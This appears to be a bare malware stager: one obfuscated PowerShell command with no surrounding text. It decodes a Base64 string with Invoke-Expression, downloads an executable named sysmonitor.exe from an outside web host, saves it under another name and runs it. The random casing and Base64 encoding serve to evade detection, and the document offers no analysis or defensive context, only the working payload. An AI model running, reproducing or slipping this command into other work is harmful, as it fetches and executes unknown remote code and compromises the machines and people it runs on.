iex([sYSTEM.text.eNcoDiNg]::utF8.GetsTRINg([SYsTem.conVERT]::FROmBaSe64STRInG('CihOZXctT2JqZWN0IFN5c3RlTS5uZXQud0VCQ2xpRW50KS5Eb3dubE9hREZJTGUoJ2h0dHA6Ly9haXJjcmFmdHBucy5jb20vX2xheW91dC9pbWFnZXMvc3lzbW9uaXRvci5leGUnLCdmbGVlYmxlLmV4ZScpO1N0YXJ0LVByb2Nlc3MgJ2ZsZWVibGUuZXhlJwoK')));exit

